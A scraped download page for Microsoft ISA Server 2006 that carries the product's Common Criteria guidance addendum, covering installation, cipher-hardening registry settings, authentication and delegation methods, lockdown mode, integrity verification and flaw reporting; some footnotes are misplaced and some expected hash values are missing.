Download ISA Server 2006 Full iso 64 bit
Generally, a download manager enables downloading of large files or multiples files in one session. Many web browsers, such as Internet Explorer 9, include a download manager. Stand-alone download managers also are available, including the Microsoft Download Manager. Show
if you do not have a download manager installed, and still want to download the file(s) you've chosen, please note:
The Microsoft Download Manager solves these potential problems. It gives you the ability to download multiple files at one time and download large files quickly and reliably. It also allows you to suspend active downloads and resume downloads that have failed. Microsoft Download Manager is free and available for download now. Developer's DescriptionMicrosoft Internet Security and Acceleration (ISA) Server 2006 Service Pack 1 introduces new features and functionality to ISA Server 2006 Standard and Enterprise Editions. The service pack includes configuration change tracking--registers all configuration changes applied to ISA Server to help you assess issues that may occur as a result of these changes, test button--tests the consistency of a Web publishing rule between the published server and ISA Server, traffic simulator, diagnostic Logging Viewer, support for integrated NLB mode in all three modes, including unicast, multicast, and multicast with Internet Group Management Protocol (IGMP). Previously, ISA Server integrated NLB-supported unicast mode only, support for use of server certificates containing multiple Subject Alternative Name (SAN) entries. Previously, ISA Server was able to use either only either the subject name (common name) of a server certificate, or the first entry in the SAN list, support for Kerberos Constrained Delegation (KCD) cross-domain authentication, and support for client certificate authentication in a workgroup deployment. Microsoft Internet Security and Acceleration Server1 Introduction to the Guidance AddendumThis document is required by Common Criteria for the Microsoft® Internet Security and Acceleration (ISA) Server 2006 Standard Edition and Enterprise Edition evaluation. The document should be used by any administrator who wants to ensure that the deployed ISA Server 20061 is the evaluated version (see [ST]). It is an addendum to the manual [MSISA] which is delivered with ISA Server 2006. 1.1 ScopeThis document extends the ISA Server 2006 manual [MSISA] and provides required
information for the ISA Server 2006 common criteria evaluation. 1 „ISA Server 2006“ references both configurations „ISA Server 2006 Standard Edition“ and „ISA Server 2006 Enterprise Edition“. 1.2 Security Functions and Associated ChaptersThe relevant chapters of the security functionality are summarized in the following table. Table 1.1 – Security functions and associated chapters
1.3 Warnings about Functions and PrivilegesThe administrator guidance contains warnings about functions and privileges that should be controlled in a secure processing environment. These are listed in following table. Table 1.2 – Warnings about functions and privileges
1.4 Installation of the Evaluated ISA Server 2006 Standard EditionThis document provides detailed installation instructions for Microsoft® Internet Security and Acceleration (ISA) Server 2006 Standard Edition. 1.4.1 Installation RequirementsTo use ISA Server, you need: A personal computer with a 550-megahertz (MHz) or faster processor. Microsoft Windows Server® 2003, Standard Edition (English) Service Pack 1 (SP1) including MS05-042 (KB899587), MS05-039 (KB899588), MS05-027 (KB896422), and update KB907865. Also, ensure that no additional software products have been installed on this computer. 256 megabytes (MB) of memory. 150 MB of available hard disk space. This is exclusive of hard disk space you want to use for caching. One network adapter that is compatible with the computer’s operating system, for communication with the Internal network. An additional network adapter for each network connected to the ISA Server computer. One local hard disk partition that is formatted with the NTFS file system. Please also check Section 3.5 “Requirements for the Operational Environment”. 1.4.2 Installation ProceduresISA Server 2006 Standard Edition is composed of the following components: ISA Server. This is the computer that runs the firewall. ISA Server Management. The console through which the administrator manages the enterprise. Advanced Logging. Note that the Advanced Logging component can only be installed on a computer running ISA Server services. To install the evaluated version, the administrator must install ISA Server and ISA Server Management (file \ISAAutorun.exe). The following pictures show the step-by-step installation process
for ISA Server 2006 Standard Edition.
Figure 1.1 – Disable weak algorithms Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56] “Enabled”=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128] “Enabled”=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128] “Enabled”=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128] “Enabled”=dword:00000000 1.5 Installation of the Evaluated ISA Server 2006 Enterprise Edition This document provides detailed installation instructions for Microsoft® Internet Security and Acceleration (ISA) Server 2006 Standard Edition.1.5.1 Installation RequirementsTo use ISA Server, you need: A personal computer with a 550-megahertz (MHz) or faster processor. Microsoft Windows Server® 2003, Standard Edition (English) Service Pack 1 (SP1) including MS05-042 (KB899587), MS05-039 (KB899588), MS05-027 (KB896422), and update KB907865. Also, ensure that no additional software products have been installed on this computer. 256 megabytes (MB) or more of memory. 150 MB of available hard disk space. This is exclusive of hard disk space you want to use for caching. One network adapter that is compatible with the computer’s operating system, for communication with the Internal network. An additional network adapter for each network connected to the ISA Server computer. One local hard disk partition that is formatted with the NTFS file system. Please also check Section 3.5 “Requirements for the Operational Environment”. 1.5.2 Installation ProceduresISA Server 2006 Enterprise Edition is composed of the following components: ISA Server Management. The console through which the administrator manages the enterprise. Configuration Storage server. The repository of the enterprise layout and the configuration for each server in the enterprise. This repository is an instance of Active Directory® Application Mode (ADAM). Each ISA Server computer has a local copy of its configuration that is a replica of the server’s configuration, which is located on the Configuration Storage server. ISA Server services. This is the computer that runs the firewall. The computer running ISA Server services is connected to a Configuration Storage server, which stores the configuration information. Additional components. Additional components (Advanced Logging, Firewall Client Share, and Message Screener) can be installed on separate computers. Note that the Advanced Logging component can only be installed on a computer running ISA Server services. To install the evaluated version, the administrator must install ISA Server Management and the Configuration Storage server (file \ISAAutorun.exe) on the same machine. The following pictures show the step-by-step installation process for ISA Server 2006 Enterprise Edition.
Figure 1.2 – Disable weak algorithms Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56] “Enabled”=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128] “Enabled”=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128] “Enabled”=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128] “Enabled”=dword:00000000 2 Security FunctionsThis chapter identifies all the security functions available to the administrator. The security functions are derived from the ISA Server 2006 security functions described in the ISA Server 2006 Security Target (ST). Warnings The administrator must ensure that ISA Server 2006 is installed and used with Windows Server 2003. More details can be found in the Security Target of ISA Server 2006 Standard Edition/Enterprise Edition [ST]. The administrator has to observe the Security Bulletins, to ensure that all possible countermeasures are used. The administrator should check http://www.microsoft.com/security/regularly for the latest ISA Server 2006 service packs and hotfixes. The administrator should only use programs that are required to administer and operate the firewall. The administrator should not install additional software which may compromise the security of the TOE or the underlying operating system. 2.1 SF1 – Web Identification and AuthenticationThe TOE can be configured in a way that only particular users are allowed to access the networks through the TOE using Forms-based authentication. Important When trying to connect to a Web site via HTTP (not HTTPS) that is published using ISA Server 2006, you receive an error message (see Figure 2.1), when all the following conditions are true: The Web listener has any one of the following authentication methods enabled: o Basic authentication o Radius authentication o Forms-Based authentication The Web listener is configured to listen for HTTP traffic. The “Require all users to authenticate” check box is selected for the Web listener or the Web publishing rules apply to a user set other than the default All users user set. You connect to the published Web site by using HTTP instead of by using HTTPS. If the ISA Server Web listener has Basic authentication enabled, you receive the following error message: Error Code: 403 Forbidden. The page must be viewed over a secure channel (Secure Sockets Layer (SSL)). Contact the server administrator. (12211) If the ISA Server Web listener has RADIUS authentication or Microsoft Outlook Web Access Forms-Based authentication (Cookie-auth) enabled, you receive the following error message: Error Code: 500 Internal Server Error. An internal error occurred. (1359) When you use HTTP-to-HTTP bridging, ISA Server 2006 does not enable traffic on the external HTTP port if the Web listener is configured to request one or more of the following kinds of credentials: Basic authentication Radius authentication Forms-based authentication This behavior occurs because these kinds of credentials should be encrypted. These credentials should not be sent in plaintext over HTTP. 2 For ISA Server 2004 versions that are earlier than ISA Server 2004 SP2, you are prompted to enter credentials in plaintext. This behavior may cause the credentials to be transmitted over the network in plaintext if you have not Warnings When using Forms-based authentication, depending on the application on the computer which could “cache” the password, the user must ensure that the environment is locked, when it is unattended. To secure transferred user identification and authentication credentials, ensure that strong SSL encryption (at least 128 bit) is enforced. 2.2 SF2 – Information Flow ControlThe TOE combines several security mechanisms to enforce the security policies at different network layers: a
rule base for incoming and outgoing requests, Web and application filters, and system security configuration options. Warning The following Windows Server 2003 vulnerabilities require that the administrator, on computers without updates, does not publish certain ports from the local host to the external interface or that the administrator ensure that a certain configuration has been applied: MS06-018 requires blocking following ports to the local host at the firewall: – All unsolicited inbound traffic on ports greater than 1024 MS06-032 required to disable IP source routing: Disabling
IP source routing will prevent an affected host from processing IP source- related packets that could allow an attacker to execute code. IP source routing processing can be disabled by the following registry key: implemented some other form of network security, such as an external Secure Sockets Layer (SSL) accelerator or an encrypted tunnel. ISA Server 2006 does not provide these forms of security. Add the DWORD Value: DisableIPSourceRouting. Set the value to 2. This value disables IP source routing processing. By default, this key does not exist. 2.3 SF3 – AuditThe TOE stores logging information in different log files: Firewall service log The Firewall log contains records of packets that were dropped in the packet filter level. It is possible to turn on logging for packets that were permitted to traverse the firewall. Access rules can be configured selectively to create or not to create a log file entry when a packet has been blocked or permitted. Web proxy service log The Web Proxy log stores a line per HTTP request that it gets. Each request (incoming and outgoing) is always logged. Windows application event log The Windows application event log stores important system events and failures. Warning It should be assured that there is always enough free disk space. Choosing the right resource and the right parameters for logging is mandatory. Creating logs that are too large or creating too many files can lead to problems. Nevertheless, it is possible to create an alert, which will move or delete old or unneeded log files. 2.4 Administration-Related InterfacesThe administrator interacts with the TOE via a Microsoft Management Console snap-in. (The Microsoft Management Console is provided by the IT environment.) The application interacts with the local registry and local file system of the
operating system (Windows Server 2003) and finally with the TOE. Warning (Enterprise Edition only) By default, policy changes are applied within a time frame of 15 seconds since the relevant configuration data has to be polled from ADAM. 2.5 TOE User InterfacesThere are no user-related manuals provided. (Due to the nature of a firewall product, the filtering process is transparent to the user.) 3 Operating EnvironmentThe security environment of the evaluated configurations of ISA Server 2006 is described in the ISA Server 2006 Standard Edition/Enterprise Edition Security Target [ST] and identifies the threats to be countered by ISA Server 2006, the organizational security policies, and the usage assumptions as they relate to ISA Server 2006. The administrator should ensure that the environment meets the
organizational policies and assumptions. They are restated here from the Security Target. 3.1 AssumptionsTable 3.1 lists the TOE Secure Usage Assumptions for the IT environment and intended usage. Table 3.1 – Assumptions for the IT environment and intended usage
3.2 Organizational Security PoliciesSecurity policies to be fulfilled by the TOE are defined in Table 3.2. Table 3.2 – Security policies addressed by the TOE
3.3 Secure Usage Assumptions – IT Security Requirements for the IT EnvironmentThis chapter identifies the TOE security functional requirements for the IT environment. Further information about the Security Functional Requirements can be found in [ST]. Table 3.3 – TOE security functional requirements for the environment
3.4 Security Objectives for the EnvironmentTable 3.4 lists security objectives for the environment (covers objectives for the IT environment and non-IT environment). Table 3.4 – Security objectives for the environment
3.5 Requirements for the Operational EnvironmentThe operational environment is a certified Windows Server 2003 Standard Edition (English) SP1 including MS05-042 (KB899587), MS05-039 (KB899588), MS05-027 (KB896422), and patch KB907865 (same installation that has been used for Windows Server 2003 Common Criteria EAL 4+ Evaluation; Validation Report Number CCEVS-VR-05-0131, [WINST] and [WINVR]). When you scan your computer for available updates, through the Windows Update Web site, the Windows Update Web site displays a number along with the title of the
update, for example, “Update for Windows Media Player 9 Series (KB837272).” This KB number is included in the security bulletin to help identify the corresponding KB article in the Microsoft Knowledge Base. Warning The administrator should check http://www.microsoft.com/security/regularly for the
latest Windows Server 2003 hotfixes. 3 online available: http://go.microsoft.com/fwlink/?LinkID=24507 4 Security-Relevant EventsThis subsection describes all types of security-relevant events and what administrator action (if any) to take to maintain security. Security-relevant events that may occur during operation of ISA Server 2006 must be adequately defined to allow administrator intervention to maintain secure operation. Security-relevant events are defined as events that signify a security related change in the system or environment. These changes can be grouped as routine or abnormal. The routine events are already addressed in subsection Security Functions. Table 4.1 – Security-relevant events
5 TOE IntegrityThis chapter describes how the administrator can verify that the evaluated version of the TOE is used. 5.1 Integrity of the CD-ROM ContentCustomers can check the CD content by using the publicly available Microsoft File Checksum Integrity Verifier (FCIV) tool4. ISA Server 2006 Standard Edition (on CD-ROM) ISA Server 2006 Enterprise Edition (on CD-ROM) The corresponding hash files are available from the Microsoft corporate Web site, as well as a batch file that runs the tool and a Readme file that explains the usage for users that do not have access to this document. The hash file contains SHA-1 values for each of the relevant files that must be verified and is downloadable using a secured channel from the ISA Server common criteria Web page: Please perform the following steps in order to ensure the integrity of your downloads from this website: 1. Download the FCIV tool from http://support.microsoft.com/default.aspx?scid=kb;en-us;841290. The sha-1 value of this download is 99fb35d97a5ee0df703f0cdd02f2d787d6741f65 (hex) and shall be verified before executing the download. This can be done using any tool capable of calculating SHA-1 values. Installation instruction and download link on following Web page: http://support.microsoft.com/default.aspx?scid=kb;en-us;841290 2. Download the “Integrity Check ISA 2006” and “CC Guidance Documentation Addendum” to the directory where FCIV has been extracted. 3. Open a command prompt and change to directory where FCIV has been extracted. 4. Check the integrity of “Integrity Check ISA 2006” using fciv “Integrity Check ISA 2006.zip” –sha1 and verify that the result is 5. Check the integrity of the CC Guidance Addendum using fciv “CC Guidance Documentation Addendum for ISA 2006.pdf” – sha1 and verify that the result is 6. Follow the CC Guidance Addendum for further Installation and Configuration of the TOE. Figure 5.1 – Example of Integrity check I (successful)
Figure 5.2 – Example of Integrity check II (missing FDIV tool) 5.2 Integrity of the PackageISA Server 2006 Enterprise Edition is
available in a volume license only (see Figure 5.4), there is no retail box with certificate of authenticity (COA) label on a box like for ISA Server 2006 Standard Edition (see Figure 5.3). Nevertheless the end user should check the integrity as described in chapter 5.1 for ISA Server 2006 Standard Edition respectively ISA Server 2006 Enterprise Edition. Figure 5.3 – ISA Server 2006 Standard Edition (Box & CD-ROM) Figure 5.4 – ISA Server 2006 Enterprise Edition (CD-ROM) 5.3 Version Number for the TOEThe method to examine the ISA Server version number is included in the Microsoft Management Console. The user can identify the version of the TOE in the Help menu (HelpAbout ISA Server 2006; see Figure 5.6). The version number presented in the Microsoft Management Console is 5.0.5720.100. That version corresponds to the evaluated version named in the ST which is ISA Server 2006. From the about boxes it is not obvious which configuration of ISA Server 2006 is installed. When in the left pane of the management console the branch “Enterprise” exists you have installed ISA Server 2006 EE (see Figure 5.7). Figure 5.5 – Version number of ISA Server 2006 Standard Edition Figure 5.6 – Version number of ISA Server 2006 Enterprise Edition Figure 5.7 – Identifying ISA Server 2006 Enterprise Edition 6 Annotations6.1 Authentication methodsThis chapter describes how ISA Server manages authentication. It provides information about authentication and delegation methods supported by the TOE, and how the authentication process is handled. 6.1.1 Single Sign OnSingle sign on (SSO) enables users to authenticate once to the TOE, and then access all of the Web servers with the same domain suffix that the TOE is publishing on a specific listener, without re-authenticating. Web servers can include Microsoft Outlook Web Access servers and servers running Microsoft Office SharePoint Portal Server 2003, as well as standard servers running
Internet Information Services (IIS). Security Notes
Note There is no support for SSO between different Web listeners. Published servers must share the same Domain Name System (DNS) suffix. For example, you can configure SSO when publishing mail.fabrikam.com and team.fabrikam.com. You cannot configure SSO when publishing mail.fabrikam.com and mail.contoso.com. The DNS suffix consists of the entire string that follows the first dot. For example, to configure SSO between mail.detroit.contoso.com and mail.cleveland.contoso.com, you would use the DNS suffix contoso.com. 6.1.2 Authentication ProcessThere are three components of the authentication process in the TOE:
Step 1, receipt of client credentials: The client sends a request to connect to the corporate Outlook Web Access server in the Internal network. The client provides the credentials in an HTML form (Frontend authentication). Steps 2 and 3, sending credentials: The TOE sends the credentials to the authentication provider, such as a domain controller for Integrated Windows authentication, or a RADIUS server, and receives acknowledgment from the authentication provider that the user is authenticated (Gateway authentication). Step 4, authentication delegation: The TOE forwards the client’s request to the Outlook Web Access server, and authenticates itself to the Outlook Web Access server using the client’s credentials. The Outlook Web Access server will revalidate those credentials, typically using the same authentication provider (Backend authentication). Note The Web server must be configured to use the authentication scheme that matches the delegation method used by the TOE. Step 5, server response: The Outlook Web Access server sends a response to the client, which is intercepted by the TOE. Step 6, forwarding the response: The TOE forwards the response to the client. Note
6.1.3 Client Authentication Methods for Receipt of Client CredentialsThe TOE Web listeners accept the following types of authentication from clients:
6.1.3.1 No Authentication You can select to require no authentication. If you do so, you will not be able to configure a delegation method on rules that use this Web listener. 6.1.3.2 Forms-Based Authentication Forms-based authentication in ISA Server 2006 can be used for publishing any Web server. One type of forms-based authentication is available in the TOE (Passcode form and Passcode/Password form have not been evaluated): • Password form. The user enters a user name and password on the form. This is the type of credentials needed for Integrated and RADIUS credential validation. Notes
• You should ensure that your Web application is designed to resist session riding attacks (also known as cross-site-posting, cross-site-request-forgery, or luring attacks) before publishing it using the TOE. This is particularly important for Web servers published through the TOE, because clients must use the same trust level for all of the Web sites they access through the publishing ISA Server firewall. 6.1.4 Methods for Validation of Client CredentialsYou can configure how the TOE validates client credentials. The TOE supports these providers and protocols:
Note A publishing rule with a Web listener that uses a specific form of credential validation must use a user set that is consistent with that form of validation. For example, a publishing rule with a Web listener that uses LDAP credential validation must also use a user set that consists of LDAP users. 6.1.4.1 Configuring Receipt and Validation of Client Credentials You can configure the receipt and validation of client credentials on the Web listener for a publishing rule. Important When you use the same Web listener to publish more than one application in the same domain, a user who is authenticated for one application will also be able to access the others, even if single sign on is not enabled. 6.1.4.2 Integrated The TOE checks if the user is a member of the local user database. 6.1.4.3 Radius authentication RADIUS is used to provide credentials validation. When ISA Server is acting as a RADIUS client, it sends user credentials and connection parameter information in the form of a RADIUS message to a RADIUS server. The
RADIUS server authenticates the RADIUS client request, and sends back a RADIUS message response. 6.1.4.3.1 Configuring the TOE for RADIUS authentication When you configure the Web listener on ISA Server, select RADIUS authentication as the authentication provider. When you add a RADIUS server, you must configure the following:
6.1.4.3.2 Security considerations The RADIUS User-Password hiding mechanism might not provide sufficient security for passwords. The RADIUS hiding mechanism uses the RADIUS shared secret, the Request Authenticator, and the use of the MD5 hashing algorithm to encrypt the User-Password and other attributes, such as Tunnel-Password and MS-CHAP-MPPE-Keys. RFC 2865 notes the potential need for evaluating the threat environment and determining whether additional
security should be used.
6.1.5 Authentication DelegationAfter validating the credentials, you can configure publishing rules to use one of the following methods to delegate the credentials to the published servers:
6.1.5.1 Configuring Authentication Delegation Delegation of client credentials is configured on the publishing rule. In the Publishing Rule Wizard, configure this on the Authentication Delegation page. In the publishing rule properties, the authentication settings are on the Authentication Delegation tab. 6.1.5.2 No Delegation, and Client Cannot Authenticate Directly Credentials are not delegated. This is intended to prevent the unintentional delegation of credentials into the organization, where they might be sniffed. This is the default setting in some ISA Server publishing wizards, so that if you want to delegate credentials, you must change the default. 6.1.5.3 No Delegation, but Client May Authenticate Directly When you select the delegation method No Delegation, but client may authenticate directly, the user’s credentials are passed to the destination server without any additional action on the part of ISA Server. The client and the destination server then negotiate the authentication. 6.1.5.4 Basic delegation In Basic delegation, credentials are forwarded in plaintext to the server that requires credentials. If authentication fails, ISA Server replaces the delegation with the authentication type used by the Web listener. If the server requires a different type of credentials, an ISA Server alert is triggered. 6.2 Lockdown ModeA
critical function of a firewall is to react to an attack. When an attack occurs, it may seem that the first line of defense is to disconnect from the Internet, isolating the compromised network from malicious outsiders. However, this is not the recommended approach. Although the attack must be handled, normal network connectivity must be resumed as quickly as possible, and the source of the attack must be identified. An event triggers the Firewall service to shut down. When you configure alert definitions, you decide which events will cause the Firewall service to shut down. Essentially, you configure when ISA Server enters lockdown mode. The Firewall service is manually shut down. If you become aware of malicious attacks, you can shut down the Firewall service, while configuring the ISA Server computer and the network to handle the attacks. 6.2.1 Affected functionalityWhen in lockdown mode, the following functionality applies: The packet filter driver applies the firewall policy. The following system policy rules are still applicable: Allow ICMP from trusted servers to the local host. Allow remote management of the firewall using MMC (RPC through port 3847). Allow remote management of the firewall using RDP. Outgoing traffic from the Local Host network to all networks is allowed. If an outgoing connection is established, that connection can be used to respond to incoming traffic. For example, a DNS query can receive a DNS response, on the same connection. No incoming traffic is allowed, unless a system policy rule (listed previously) that specifically allows the traffic is enabled. The one exception is DHCP traffic, which is allowed by default system policy rules. The UDP Send protocol on port 68 is allowed from all networks to the Local Host network. The corresponding UDP Receive protocol on port 67 is allowed. VPN remote access clients cannot access ISA Server. Similarly, access is denied to remote site networks in site-to-site VPN scenarios. Any changes to the network configuration while in lockdown mode are applied only after the Firewall service restarts and ISA Server exits lockdown mode. For example, if you physically move a network segment and reconfigure ISA Server to match the physical changes, the new topology is in effect only after ISA Server exits lockdown mode. ISA Server does not trigger any alerts. For ISA Server Enterprise Edition, if the Configuration Storage server is installed on the computer running ISA Server services, a system policy rule, named “Allow access from trusted servers to the local Configuration Storage server”, is enabled. This system policy rule allows the use of Microsoft CIFS (TCP), Microsoft CIFS (UDP), and MS Firewall Storage protocols from all array members to the Local Host. This rule is applied even in lockdown mode. Traffic using those protocols is allowed, even in lockdown mode. 6.2.2 Leaving lockdown modeWhen the Firewall service restarts, ISA Server exits lockdown mode and continues functioning, as previously. Any changes made to the ISA Server configuration are applied after ISA Server exits lockdown mode. 7 Flaw Remediation Guidance7.1 How to report detected security flaws to MicrosoftMicrosoft has established a single internal organization, the Microsoft Security Response Center (MSRC), to investigate and remedy security vulnerabilities
involving Microsoft software or services. The MSRC is staffed 7 days a week, and investigates every report it receives of suspected security vulnerabilities in Microsoft Products. Reporter contact information (name and email; optionally) Information about the reporter’s computer (manufacturer and model, additional hardware, operating system, system service packs, operating system security patches) Affected product information (product name, product version, service packs for the product, security patches for the product, vulnerability information) Description of the flaw in the product (general description) Product configuration (default/customized, required settings to make the flaw appear) Description how to reproduce the problem (step-by-step instructions that demonstrate the flaw, program that demonstrates the flaw) Description how someone might mount an attack via the flaw Additional information that might be helpful in investigating this issue. Data submitted via this page is encrypted using the Secure Sockets Layer protocol. The MSRC’s PGP key is available at http://www.microsoft.com/technet/security/MSRC.asc 7.2 How to get informed about Security Flaws and Flaw Remediation A security update that is issued by the MSRC is always accompanied with a bulletin. The bulletin contains the information that Microsoft makes available for the customers so that they can take a decision whether to install the fix and on what systems. Every bulletin comes with a rating to reflect its criticality (four levels). A KB is also provided but it is mostly a pointer to the bulletin article.The public page with Microsoft bulletins is located at http://www.microsoft.com/security/bulletins/default.mspx 7.3 Installing a remedyThe security bulletins contain the affected product versions, links to download the security patch, and guidance for manual (as well as automated) installation of the patch. Figure 7.1 – Installation Instructions for Security Bulletin (example) 7.4 Authentication of a FixFor a product released
via the web, digital signatures are used to identify the source download as coming from Microsoft. 8 References and GlossaryThis section provides references and a glossary. 8.1 ReferencesGeneral Common Criteria Documents [CC] Common Criteria for Information Technology Security Evaluation, version 2.3, revision August 2005 Part 1: Introduction and general model, CCMB-2005-08-001, Part 2: Security functional requirements, CCMB-2005-08-002, Part 3: Security Assurance Requirements, CCMB-2005-08-003 ISA Server 2006 Administrator Guidance and Publicly Available Evaluation Developer Documents [MSISA] Microsoft Internet Security and Acceleration Server 2006 Help, Microsoft Corp., Version 2006 Standard Edition / Enterprise Edition This help file is installed during ISA Server 2006 setup (isa.chm, stored on CD-ROM). [MSISAHARD] Security Hardening Guide – Microsoft Internet Security and Acceleration Server 2004, Microsoft Corp., Version 2006, downloadable from http://go.microsoft.com/fwlink/?LinkID=24507 [ST] ISA Server 2006 SE/EE Common Criteria Evaluation – Security Target, Version 1.1, 2007-06-05, Microsoft Corp. [WINST] Microsoft Windows Server 2003 or Windows XP Security Target, Version 1.0. 28.09.2005, Microsoft Corporation [WINVR] National Information Assurance Partnership, Common Criteria Evaluation and Validation Scheme Validation Report Microsoft Windows Server 2003 and Windows XP Workstation Report Number: CCEVS-VR-05-0131 Dated: November 6, 2005 Version: 1.1 8.2 Acronyms
8.3 Glossary
|